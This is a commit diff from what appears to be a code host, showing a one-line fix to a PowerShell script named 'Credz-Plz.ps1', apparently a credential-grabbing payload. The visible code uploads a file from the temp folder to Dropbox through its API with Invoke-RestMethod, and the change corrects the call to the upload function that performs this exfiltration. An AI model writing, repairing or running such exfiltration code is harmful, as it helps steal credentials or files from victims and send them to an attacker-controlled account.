Update Credz-Plz.ps1
This commit is contained in:
parent
59d94e1d8b
commit
cf558e035e
1 changed files with 1 additions and 1 deletions
|
@ -159,7 +159,7 @@ $headers.Add("Content-Type", 'application/octet-stream')
|
||||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
}
|
}
|
||||||
|
|
||||||
if (-not ([string]::IsNullOrEmpty($db))){dropbox -FileName $env:TMP\$FileName}
|
if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -FileName $env:TMP\$FileName}
|
||||||
|
|
||||||
#------------------------------------------------------------------------------------------------------------------------------------
|
#------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue